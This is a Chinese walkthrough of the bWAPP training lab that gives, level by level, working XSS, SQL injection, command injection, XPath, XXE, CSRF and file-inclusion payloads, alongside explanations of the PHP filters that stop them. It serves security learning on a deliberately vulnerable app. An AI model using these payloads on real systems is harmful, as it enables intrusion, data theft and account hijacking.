bwapp通关教程

article/2025/9/26 5:52:25

**

HTML Injection - Reflected (GET)

**
low:
在这里插入图片描述
低级漏洞中,输入数据没有做校验

First name: <script>alert( 'xss' )</script>

Last name: <script>alert( 'xss' )</script>

出现xss即为成功。

medium

和low一样,但发现被全部显示

在这里插入图片描述抓包,在这里插入图片描述会发现符号<>均被编码

0,1,2分别对应三个等级
找见对应的/bWAPP/bwapp/htmli_get.php文件
在这里插入图片描述三个等级分别要进行不同的检测
还会发现要调用functions_external.php文件
在这里插入图片描述在这里插入图片描述

$input = urldecode($input);

这里使用了urldecode函数,对字符串进行URL解码,返回的是已解码的字符串
所以可以在输入框输入编码后的代码
在这里插入图片描述
high
同medium操作一样,也被全部显示
在这里插入图片描述
抓包,在这里插入图片描述会发现和medium一样<>均被编码

但是如果尝试在输入框输入编码后的代码并不能成功
在这里插入图片描述
在这里插入图片描述htmlspecialchars() 函数把预定义的字符&," ,’ ,<,> 转换为 HTML 实体,是安全的

HTML Injection - Reflected (POST)

操作同HTML Injection - Reflected (GET)一样,只不过是成了post方式。

HTML Injection - Reflected (Current URL )

low:
在这里插入图片描述在url中构造语句
在这里插入图片描述
尝试抓包
在这里插入图片描述
将被编码的部分改成正常的
在这里插入图片描述解题成功。

medium&high

在这里插入图片描述
发现同low级别的一样,但当尝试抓包修改为正常的并不能成功,查看源码
在这里插入图片描述找见这个htmli_ current_ url.php文件后,发现这样的一段代码

还会发现在case"2"时要进行xss_check_3的检测
(xss_check_3见HTML Injection - Reflected (GET)的high级别)
在这里插入图片描述

HTML Injection - Stored (Blog)

low:在这里插入图片描述发现有输入框,尝试一下xss注入在这里插入图片描述
medium
在这里插入图片描述
这次虽然显示已经添加,但是并没有弹窗,看源码在这里插入图片描述
在这里插入图片描述

查看 functions_external.php 文件

在这里插入图片描述
可以看到case"1"或case"2"都要进行sqli_check_3检测

function sqli_check_3($link, $data)
{  return mysqli_real_escape_string($link, $data);
}

mysqli_real_escape_string就是要转义在SQL语句中使用的字符串中的特殊字符
PHP mysqli_real_escape_string() 函数

iFrame Injection

iframe是可用于在HTML页面中嵌入一些文件(如文档,视频等)的一项技术。对iframe最简单的解释就是“iframe是一个可以在当前页面中显示其它页面内容的技术”
通过利用iframe标签对网站页面进行注入,是利用了HTML标签,实际上就是一个阅读器,可以阅读通过协议加载的活服务器本地的文件、视频等

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
low
在这里插入图片描述
没有对参数进行过滤,可以控制param标签的输入
在这里插入图片描述
medium

function xss_check_4($data)
{// addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.// These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).// Do NOT use this for XSS or HTML validations!!!return addslashes($data);}

可以看出medium不能控制paramurl的输入,所以只能通过控制ParamHeight和ParamWidth来实现注入

大体意思就是addslashes会在数据库查询中需要引用的字符(’,",\)前返回一个反斜杠字符串进行构造
在这里插入图片描述
high:

function xss_check_3($data, $encoding = "UTF-8")
{// htmlspecialchars - converts special characters to HTML entities    // '&' (ampersand) becomes '&amp;' // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set// "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set// '<' (less than) becomes '&lt;'// '>' (greater than) becomes '&gt;'  return htmlspecialchars($data, ENT_QUOTES, $encoding);}

htmlspecialchars()函数会把预定义的字符(&,’,",<,>)转换为 HTML 实体

LDAP Injection (Search)

LDAP 全英文:Lightweight Directory Access Protocol,翻译过来就是轻量级的目录访问协议。其实就是访问目录,浏览目录。有很多企业存储一些数据信息,例如部门信息,部门里成员的信息,公司的可用设备信息等,这些信息单独放在类似于网站的那种数据库中的话,会显的有点大材小用,而把它们放在目录中,文本中最合适。好比在文档中搜索指定的内容,在目录中搜索指定的文件一样。
LDAP 也有自己指定的语法,也可理解为它是一个存储信息的数据库,为了搜索方便,很多网站提供了其查询的接口,和普通的搜索框无异,对于指定的搜索内容,在没有严格过滤的情况下,便可以造成LDAP 注入。

在这里插入图片描述
尝试在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
Mail Header Injection (SMTP)

通常的做法是网站实施联系表单,反过来将合法用户的电子邮件发送给消息的预期收件人。大多数情况下,这样的联系表单将设置SMTP标头From,Reply-to以便让收件人轻松处理联系表单中的通信,就像其他电子邮件一样。
不幸的是,除非用户的输入在插入SMTP头之前被验证,否则联系表单可能容易受到电子邮件头插入(也称为SMTP头注入)的攻击。这是因为攻击者可以将额外的头部注入到消息中,从而指示SMTP服务器执行与预期不同的指令。

在这里插入图片描述
在这里插入图片描述
OS Command Injection
在这里插入图片描述
www.nsa.gov;dir在这里插入图片描述www.nsa.gov&&dir

在这里插入图片描述原理:在DNS查询之后再执行dir命令

medium在这里插入图片描述
在这里插入图片描述
commandi_check_1是把&和;替换了,还可以使用|

构造

www.nsa.gov | dir

high

escapeshellcmd()函数用来跳过字符串中的特殊符号,防止恶意用户耍花招破解服务器系统

OS Command lnjection - Blind
在这里插入图片描述
盲注就是注入后并不会返回信息,要根据反应时间判断命令是否成功执行
输入 127.0.0.1
在这里插入图片描述输入 127.0.0.1&&dir
在这里插入图片描述PHP Code Injection
在这里插入图片描述

low:
在这里插入图片描述medium&high
使用了htmlspecialchars函数无法绕过
在这里插入图片描述
Server-Side Includes (SSI) Injection

SSI是英文"Server Side
Includes"的缩写,翻译成中文就是服务器端包含的意思。SSI是用于向HTML页面提供动态内容的Web应用程序上的指令。
它们与CGI类似,不同之处在于SSI用于在加载当前页面之前或在页面可视化时执行某些操作。 为此,Web服务器在将页面提供给用户之前分析SSI
可在SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含的SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。Server-Side
Includes攻击允许通过在HTML页面中注入脚本或远程执行任意代码来利用Web应用程序。
一种对于这类漏洞的挖掘方式即是查看.stm,.shtm和.shtml的页面是否存在,但是缺少这些类型的页面并不意味着不存在SSI攻击。

在这里插入图片描述

默认Apache不开启SSI,SSI这种技术已经比较少用了 IIS和Apache都可以开启SSI功能

输入表单,lookup之后在这里插入图片描述

核心代码

<div id="main"><h1>Server-Side Includes (SSI) Injection</h1><p>What is your IP address? Lookup your IP address... (<a href="http://sourceforge.net/projects/bwapp/files/bee-box/" target="_blank">bee-box</a> only)</p><form action="<?php echo($_SERVER["SCRIPT_NAME"]);?>" method="POST"><p><label for="firstname">First name:</label><br />                                        //firstname表单<input type="text" id="firstname" name="firstname"></p><p><label for="lastname">Last name:</label><br />                                          //lastname表单<input type="text" id="lastname" name="lastname"></p><button type="submit" name="form" value="submit">Lookup</button></form><br /><?phpif($field_empty == 1)                                                              //这里的PHP只是判断是否有输入{echo "<font color=\"red\">Please enter both fields...</font>";}else{echo "";}?></div>

防护代码

$field_empty = 0;function xss($data)
{switch($_COOKIE["security_level"]){case "0" :$data = no_check($data);break;case "1" :$data = xss_check_4($data);break;case "2" :$data = xss_check_3($data);break;default :$data = no_check($data);break;}return $data;}if(isset($_POST["form"]))
{$firstname = ucwords(xss($_POST["firstname"]));                                            //ucwords()首字母大写$lastname = ucwords(xss($_POST["lastname"]));if($firstname == "" or $lastname == ""){$field_empty = 1;}else{$line = '<p>Hello ' . $firstname . ' ' . $lastname . ',</p><p>Your IP address is:' . '</p><h1><!--#echo var="REMOTE_ADDR" --></h1>';// Writes a new line to the file$fp = fopen("ssii.shtml", "w");fputs($fp, $line, 200);fclose($fp);header("Location: ssii.shtml");exit;}}?>

low:
low级别,没有防护,能xss
在这里插入图片描述
medium:

function xss_check_4($data)
{// addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.// These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).// Do NOT use this for XSS or HTML validations!!!return addslashes($data);         }

addslashes()在符号前加反斜线

high:

function xss_check_3($data, $encoding = "UTF-8")
{// htmlspecialchars - converts special characters to HTML entities// '&' (ampersand) becomes '&'// '"' (double quote) becomes '"' when ENT_NOQUOTES is not set// "'" (single quote) becomes ''' (or &apos;) only when ENT_QUOTES is set// '<' (less than) becomes '<'// '>' (greater than) becomes '>'return htmlspecialchars($data, ENT_QUOTES, $encoding);}

将预定义的字符装换为html实体字符

SQL Injection (Search/GET)

直接 ’or 1=1# ,爆出所有数据在这里插入图片描述
构造语句爆出数据

' union select 1,2,3,4,5,6,7 #

在这里插入图片描述
在这里插入图片描述
爆出用户名,数据库名

' union select 1,user(),database(),4,5,6,7 #

在这里插入图片描述
medium:
用报错注入
在这里插入图片描述

on' and updatexml(1,concat(0x7e,(database()),0x7e),1)#

high:
漏洞将没有

SQL Injection (Search/POST)

同上

SQL Injection (Search/CAPTCHA)

还同上

' union select 1,user(),database(),4,5,6,7 #

在这里插入图片描述

SQL Injection (Select/GET)

And 1=1有值

And 1=2 没值

所以这是数字型注入
在这里插入图片描述
在这里插入图片描述
中等和高等被过滤了

SQL Injection (Login Form)

这里可以直接使用报错注入来注入,源码中有输出报错信息

' and updatexml(1,concat(0x7e,(database()),0x7e),1)--+

在这里插入图片描述
在这里插入图片描述
中等和高等漏洞修复了

SQL Injection - Stored (Blog)

这是插入语句,我们构造下即可

test', (select database())) #

在这里插入图片描述中等和高等进行了过滤,无法注入,但好像没有过滤xss

所以用<script>alert(/xss/)</script>
在这里插入图片描述
在这里插入图片描述

SQL Injection - Blind (Search)

Iron Man’ and sleep(5)#

输入语句发现它沉睡了

说明是sql盲注了在这里插入图片描述' and (if((substr((select version()),1,1)=5),sleep(5),null)) --+

可以看到第一个数字是5,版本号
在这里插入图片描述
中等和高等都进行了过滤

XML/XPath Injection (Login Form)

账号密码都填1’ or ‘1’ = '1即可在这里插入图片描述
中等和高等都进行了过滤

Broken Auth. - Forgotten Function

Email用了mysqli_real_escape_string进行过滤

进行暴力破解即可在这里插入图片描述

在这里插入图片描述

Broken Auth. - Insecure Login Forms

用这个账号密码即可

Tonystark

I am Iron Man

然后也可以进行爆破进行登录在这里插入图片描述
在这里插入图片描述

Broken Auth. - Logout Management

这是退出页面来的

低级设置是session是没有摧毁的

中等高等是已经摧毁了在这里插入图片描述
在这里插入图片描述

Broken Auth. - Password Attacks

在这里插入图片描述
这关进行爆破即可在这里插入图片描述
在这里插入图片描述
medium:

多了个salt在这里插入图片描述
high:

多了个验证码在这里插入图片描述

Broken Auth. - Weak Passwords

这题考的是弱密码,可以爆破

账号test

密码看等级

test

test123

Test123在这里插入图片描述

Session Mgmt. - Administrative Portals

把admin设置成1即可在这里插入图片描述
在这里插入图片描述
medium:
cookie设置成1即可在这里插入图片描述
在这里插入图片描述
high:
session设置成1即可
在这里插入图片描述

Session Mgmt. - Cookies (HTTPOnly)

Cookies中httponly字段设置为false

点击 Click Here ,就可以了在这里插入图片描述
Cookies中httponly字段设置为true

点击Click Here,本地JS脚本无法访问top_security变量值了在这里插入图片描述服务端可以在这里插入图片描述

高等就是就是把cookie的生存时间,仅有300秒

Session Mgmt. - Session ID in URL

Session直接暴露在url中,三个难度有一样在这里插入图片描述

Session Mgmt. - Strong Sessions

低难度是不安全的

medium:

可以观察到top_security_nossl的值是使用了HASH处理

在这里插入图片描述
high:

在非SSL情况下,看不到top_security_ssl的值
改用HTTPS后,可以观察到top_security_nossl值

XSS - Reflected (GET)

<script>alert(/xss/)</script>

在这里插入图片描述
medium:

用了addslashes函数

<script>alert(/xss/)</script>

high:

htmlspecialchars过滤了在这里插入图片描述

XSS - Reflected (POST)

同上

XSS - Reflected (JSON)

直接闭合即可

"}]}';alert(/xss/);</script>

在这里插入图片描述
中等和高等都过滤了

XSS - Reflected (AJAX/JSON)

低和中等都是一样的

<img src=x οnerrοr=alert(1)>

在这里插入图片描述
高等过滤了

XSS - Reflected (AJAX/XML)

低和中等都一样

<img src=x οnerrοr=alert(/xss/)>

在这里插入图片描述

XSS - Reflected (Back Button)

抓包把REFERER修改成"><script>alert(/xss/)</script>
在这里插入图片描述
在这里插入图片描述
中等的一样

XSS - Reflected (Custom Header)

在http头部添加上即可

bWAPP:<script>alert(/xss/)</script>
在这里插入图片描述
在这里插入图片描述
中等一样

高等过滤了

XSS - Reflected (Eval)

把date值换成alert(/xss/)即可在这里插入图片描述
中等还是一样

高等过滤了

XSS - Reflected (HREF)

闭合即可

/><img src=a.png οnerrοr=alert(/xss/)>

在这里插入图片描述
中等和高等使用了urlencode()过滤了

XSS - Reflected (PHP_SELF)

低和中等用这个代码<script>alert( /xss/ )</script>
在这里插入图片描述

XSS - Reflected (Referer)

低和中等一样<script>alert(/xss/)</script>在这里插入图片描述
在这里插入图片描述
高等还是用了htmlspecialchars过滤,安全

XSS - Reflected (User-Agent)

修改USER-AGENT即可

在这里插入图片描述
在这里插入图片描述
中等一样

XSS - Stored (Blog)

低和中等一样用<script>alert(/xss/)</script>,高等不行在这里插入图片描述

XSS - Stored (Change Secret)

审查元素把隐藏的类型换成text输入xss代码即可

"><script>alert(/xss/)</script><"

在这里插入图片描述
在这里插入图片描述
中等和高等换成token验证了
在这里插入图片描述

Insecure DOR (Reset Secret)

可以修改价格
在这里插入图片描述

Cross-Origin Resource Sharing (AJAX)

本题讲的是AJAX的跨域资源请求问题
在另一台服务器上,修改evil文件夹内的,attack-cors.htm文件中的服务器路径
然后在浏览器运行attack-cors.htm即可在这里插入图片描述
在这里插入图片描述

Robots File

Robots文件会暴露你的路径,列如你后台就是admin目录下的文件在这里插入图片描述

Heartbleed Vulnerability

Heartbleed错误允许Internet上的任何人读取受OpenSSL软件易受攻击版本保护的系统的内存。这会破坏用于识别服务提供商的密钥,并加密流量,用户的名称和密码以及实际内容。这允许攻击者窃听通信,直接从服务和用户窃取数据并模仿服务和用户。

Host Header Attack (Reset Poisoning)

传递任意主机头的另一种方法是使用X-Forwarded-Host头。在某些配置中,此标头将重写Host标头的值。因此,可以提出以下请求。

许多Web应用程序依赖于HTTP 主机头来理解“它们在哪里”。

主机头的使用在PHP Web应用程序中尤为常见,但是,它肯定不是PHP Web应用程序特有的问题。以下示例中的PHP脚本是主机头的典型且危险的用法。就bWAPP的这个例子而言

可以看到当低级别的时候,$server = $_SERVER[“HTTP_HOST”],这就很危险了

Insuff. Transport Layer Protection

low:
普通运输在这里插入图片描述
中等和高等是https运输的在这里插入图片描述

Text Files (Accounts)

低等级是明文运输,不安全的

中等和高等的将密码进行了sha1加密,但是这还不是很安全,因为还是可以通过字典爆破或者暴力破解甚至可以通过查表的方式找出密码。而High级别的用的是hash加盐加密技术。

Directory Traversal - Directories

在这里插入图片描述
未对输入的目录进行限制,可以访问任意目录。
在这里插入图片描述
中等限制了一些符号,但还是可以访问当前目录下的任意文件

在这里插入图片描述
在这里插入图片描述
而高等不行

Directory Traversal - Files

可以访问上级目录下的文件
在这里插入图片描述
中等和高等限制了目录遍历,但是可以在当前目录下访问

Host Header Attack (Cache Poisoning)

修改要访问的目录即可
在这里插入图片描述
在这里插入图片描述
中等和高等限制了,只能访问固定页面
在这里插入图片描述

Remote & Local File Inclusion (RFI/LFI)

修改get即可在这里插入图片描述
中等限制了php后缀的文件,我们是可%00截断的

高等限制了只能这三种语言文件在这里插入图片描述

Restrict Device Access

页面告诉我们要一些固定的设备才成访问,那我们抓包修改User-Agent即可

低,中等和高等都是可以绕过的在这里插入图片描述
Mozilla/5.0(iPhone;U;CPUiPhoneOS4_0likeMacOSX;en-us)AppleWebKit/532.9(KHTML,likeGecko)
在这里插入图片描述
在这里插入图片描述

Restrict Folder Access

可以直接访问http://172.0.0.1/bwapp/documents/bWAPP_intro.pdf
在这里插入图片描述
中等和高等不能访问
在这里插入图片描述

Server Side Request Forgery (SSRF)

在这里插入图片描述

XML External Entity Attacks (XXE)

抓包把xml代码换了即可

代码块

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM "http://192.168.56.1/bWAPP/666">
]>
<reset><login>&test;</login><secret>Any bugs?</secret></reset>

在这里插入图片描述

CSRF (Change Password)

直接点击url即可修改密码

http://192.168.56.1/bwapp/csrf_1.php?password_new=bug&password_conf=bug&action=change
在这里插入图片描述

中等和高等加多了个输入旧密码,可以弄个html页面让受害者输入进而修改密码

代码块

<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>bWAPP - CSRF</title>
</head><body><header>
<h1>bWAPP</h1>
</header>    <div id="main"><h1>CSRF (Change Password)</h1><p>Change your password.</p><form action="http://192.168.56.1/bwapp/csrf_1.php" method="GET"><p><label for="password_curr">Current password:</label><br /><input type="password" id="password_curr" name="password_curr"></p><p><label for="password_new">New password:</label><br /><input type="password" id="password_new" name="password_new"></p><p><label for="password_conf">Re-type new password:</label><br /><input type="password" id="password_conf" name="password_conf"></p>  <button type="submit" name="action" value="change">Change</button>   </form><br />
</div></body></html>

CSRF (Change Secret)

在这里插入图片描述
生成的poc让受害者点击一下即可修改成功在这里插入图片描述
中等和高等用了token来防护

CSRF (Transfer Amount)

我们把金额修改成负数的时候,我们的金额会增多
在这里插入图片描述
也可以让受害人打开url就会扣钱

http://192.168.56.1/bwapp/csrf_2.php?account=123-45678-90&amount=200&action=transfer

PHP Eval Function

直接在url中添加上?eval=phpinfo();

中等和高等也一样在这里插入图片描述

Unvalidated Redirects & Forwards (1)

抓包把url修改成http://www.baidu.com就会跳转到百度了在这里插入图片描述
中等和高等不能随意跳转了

Unvalidated Redirects & Forwards (2)

抓包修改即可
在这里插入图片描述
中等和高等被固定跳转了
在这里插入图片描述

ClickJacking (Movie Tickets)

在这里插入图片描述
在这里插入图片描述

Unrestricted File Upload

可以直接上传任意文件
在这里插入图片描述
在这里插入图片描述
中等是验证后缀,可以使用截断来绕过
在这里插入图片描述
高等是白名单


http://chatgpt.dhexx.cn/article/nITIw80Y.shtml

相关文章

新一代天气雷达文件三维可视化

链接&#xff1a;从最新文章获取百度盘地址 支持新一代天气雷达SA SB CA&#xff0c;支持FMT&#xff0c;支持SWAN格式直接将文件拖进程序即可 支持列表样例Z_RADR_I_Z***_20200803100000_O_DOR_SA_CAP.bin.bz2Z_RADR_I_Z***_20210514000000_O_DOR_SA_CAP_FMT.bin.bz2Z_OTHE_…

激光雷达动态障碍物滤除-调研与展望

0. 简介 激光雷达作为自动驾驶中最常用的传感器之一&#xff0c;由于其深度感知特性优良&#xff0c;这也让以激光SLAM为主的SLAM方法被广泛应用。但是我们发现在人员密集&#xff0c;车辆密集的场景经常会造成点云定位效果不佳&#xff0c;而这些情况传统滤波方法是没有办法解…

DAC的简单应用

1.简介 DAC指数字/模拟转换。STM32F103RCT6具有2个12位数字输入&#xff0c;模拟输出的DAC&#xff1b;支持数字输入配置成8位右对齐、12位左对齐或12位右对齐格式&#xff1b;在双DAC通道模式下支持单通道独立转换或双通道同步转换。 2.框图 根据框图&#xff0c;将数据写入…

STM32学习笔记--DAC

目录&#xff1a; 一、DAC原理1.DAC定义2.STM32DAC简介3.STM32DAC工作原理 二、STM32DAC库函数配置参考资料 一、DAC原理 1.DAC定义 DAC是Digital-to- Analog Converter的缩写&#xff0c;数字/模拟转换模块的简称&#xff0c;它的作用就是把输入的数字编码&#xff0c;转换成…

Bwapp 04 05

文章目录 Insecure DOR (Change Secret)Insecure DOR (Reset Secret)Insecure DOR (Order Tickets)安全配置 Insecure DOR (Change Secret) 抓包的话&#xff0c;就可以实行篡位修改 Insecure DOR (Reset Secret) 同上&#xff0c;换成了xml的形式 Insecure DOR (Order Ticke…

水处理相关工艺控制程序汇总(RXXW_Dor)

水处理和化工行业流程控制类程序工艺有很多相似之处,属于过程控制,并不太关心控制实时性和控制速度,这篇博客汇总项目各种工艺写法,陆续会更新。流程控制类程序很多可以利用状态机思想进行编程,有关状态机编程的详细方法可以参看下面的文章链接: PLC面向对象编程系列之有…

整理 kanban 的 DoR 和 DoD

所谓 DoR 和 DoD 就是 Definition of Ready 和 Definition of Done。 我们的敏捷团队在需求管理上主要有两个会:需求梳理会和需求计划会议。 需求梳理会的阐述的意向用户故事会放到 Backlog,后由研发 Owner 跟进,在计划会上,将符合 DoR 放入 Sprint Todo。 「Backlog」…

人生的DoR和DoD:志向、遗产

我们要为两件事做好准备&#xff1a;太阳升起和太阳落山。前者没准备好&#xff0c;则错过了大好时光。后者没准备好&#xff0c;则坠入无边黑暗。前者让你醒的来&#xff0c;后者让你睡得着。 &#xff08;一&#xff09;立志是人生的DoR 年少的刘备与同族的孩子在树下玩耍时&…

【Scrum模式语言9】准备就绪的定义(Definition of Ready - DoR )

译者序&#xff1a;在很多敏捷项目中&#xff0c;秩序诞生的标志之一是有了成文的DoR。但是项目组和需求方的折中往往也无可奈何地始于将没有就绪的需求纳入到Sprint待办事项列表&#xff0c;并为Sprint实施阶段带来一系列的不可控因素。为什么市场和产品人员时常要求技术人员在…

敏捷开发中的 DoD 和 DoR 是什么?

在敏捷开发中&#xff0c;让所有成员保持目标统一、步调和节奏一致非常重要&#xff0c;但是在团队协作中&#xff0c;认知偏差却在所难免。需求在不同环节中流转&#xff0c;是否存在某种途径能保证所有成员的理解一致&#xff0c;将偏差最小化&#xff1f; 今天跟大家介绍敏…

传播动力学--SIR模型及其应用

王道谊 2020年3月 1. 传播动力学 “道生一&#xff0c;一生二&#xff0c;二生三&#xff0c;三生万物。” ---《道德经》 所谓“不积跬步无以至千里”&#xff0c;任何变化都是由点滴变化决定并发展起来的。知道所有的微观点滴变化&#xff0c;就能够掌握宏观变化。点滴…

SIR传播模型的科普和预测

>关注公众号&#xff1a;大数据技术派&#xff0c;回复资料&#xff0c;领取1024G资料。 注&#xff1a;本文仅是个人对于几个疾病模型做的一些概念性描述&#xff08;科普&#xff09;&#xff0c;并进行了简单的编程实现。切勿当做现实的行动指导。因为文章内容原因&#…

6.复杂网络实验六:SIR病毒传播模型(matlab)

一、SIR模型简介 在典型的传染病模型中&#xff0c;种群&#xff08;Population&#xff09;内的N个个体的状态可分为如下几类&#xff1a; (1)、易染状态S(Susceptible),即健康状态&#xff0c;可被感染的个体。 (2)、感染状态I(Infected),处于感染状态的个体还能够感染将康…

传染病SIR传播模型(搬运,含带MATLAB代码)

学习笔记之SIR传染病模型TOC 本文主要是对此篇文章代码部分的详解 function ysir(~,x)a0.8; %感染率0.8b0.2; %治愈率0.2y[-a*x(1)*x(2),a*x(1)*x(2)-b*x(2),b*x(2)]; end %t 为持续时间&#xff0c;%x为三维矩阵&#xff0c;其中x(1)为易感染者&#xff0c;x(2)为传染者&…

传染病模型(4)——SIRS模型和SIER模型及matlab具体程序

前言 常见的传染病模型按照具体的传染病的特点可分为 SI、SIS、SIR、SIRS、SEIR 模型。其中“S”“E”“I”“R”的现实含义如下&#xff1a; S (Susceptible)&#xff0c;易感者&#xff0c;指缺乏免疫能力健康人&#xff0c;与感染者接触后容易受到感染&#xff1b; E (Ex…

信息传播模型——SIR的Python实现

本文通过Python语言实现SIR模型&#xff0c;并进行可视化&#xff0c;所用例子为足球俱乐部数据集。 author&#xff1a;xiao黄 缓慢而坚定的生长 我之前还写过SI和IC模型的Python实现及可视化&#xff0c;请点击传送门查看&#xff0c;希望对你们有帮助。 SIR模型是传染病模型…

疫情模拟中的SIR模型与扩展的SIRD模型

一.SIR模型 SIR模型起源于流行病学的研究&#xff0c;是模拟传染病动力学的经典模型。至今仍在流行病学中占据中心位置&#xff0c;核心在于微分方程。 SIR模型描述了流行病下三大人群&#xff1a;易感者 susceptible、感染者 infectious、痊愈者 recovered之间的关系。 SIR模…

基于SIR模型的疫情预测 matlab

基于SIR模型的疫情预测 庚子年 庚辰月 丁丑日&#xff0c;疫情从爆发到今天&#xff0c;已经有100多万人感染&#xff0c;而我国有一群这样的逆行者他们以自己的生命筑起了我国的防疫长城&#xff0c;鲁迅先生曾说“我们从古以来&#xff0c;就有埋头苦干的人&#xff0c;有拼…

python实现SI、SIS、SIR、SIRS、SEIR、SEIRS模型

传染病传播模型 SISISSIRSIRSSEIR&#xff08;相比较贴合新冠状病毒&#xff09;SEIRS 在家闲着无事&#xff0c;搜了一些关于传染病模型的知识&#xff0c;在此做个总结。 SI 最简单的SI模型首先把人群分为2种&#xff0c;一种是易感者(Susceptibles)&#xff0c;易感者是健康…

流行病模型(SIR Model)

流行病模型(SIR Model) by : ZhuoFei, Zhou 首先定义一个函数bernoulli(p) #以概率p判断是否会被感染或恢复 function bernoulli(p::Number)if rand(1)[1] < preturn trueelsereturn falseend endbernoulli (generic function with 1 method)恢复所需的时间函数recovery_…